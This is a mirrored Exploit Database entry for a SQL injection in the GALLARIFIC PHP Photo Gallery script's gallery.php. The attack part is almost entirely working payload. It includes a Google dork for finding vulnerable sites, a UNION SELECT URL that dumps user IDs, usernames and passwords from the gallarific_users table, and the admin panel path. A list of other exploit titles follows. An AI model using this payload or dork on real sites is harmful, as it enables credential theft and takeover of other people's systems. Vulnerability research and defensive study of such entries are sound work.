GALLARIFIC PHP Photo Gallery Script – ‘gallery.php’ SQL Injection

Exploit Database
29 阅读

作者： AtT4CKxT3rR0r1ST

日期： 2011-01-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15891/

GALLARIFIC PHP Photo Gallery Script (gallery.php) Sql Injection Vulnerability 
=================================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
.:. Script : http://www.gallarific.com/download.php
.:. Dork : inurl:"/gadmin/index.php"

####################################################################

===[ Exploit ]===

www.site.com/gallery.php?id=null[Sql Injection]

www.site.com/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a,username,0x3a,password),3,4,5,6,7,8+from+gallarific_users--

===[ Admin Panel ]===

www.site.com/gadmin/index.php

####################################################################

last Exploits
GALLARIFIC PHP Photo Gallery Script – ‘gallery.php’ SQL Injection的更多信息

Sitemagic CMS – ‘SMTpl’ Directory Traversal：
RosarioSIS 10.8.4 – CSV Injection：
Joomla! Component CCNewsLetter – Directory Traversal：
n-cms-equipe 1.1c.Debug – Multiple Local File Inclusions：
Student Result Management System 1.0 – ‘class’ SQL Injection：
Joomla! Component JComments 2.1 – ‘ComntrNam’ Cross-Site Scripting：
forma.lms The E-Learning Suite 2.3.0.2 – Persistent Cross-Site Scripting：
Online Thesis Archiving System 1.0 – SQLi Authentication Bypass：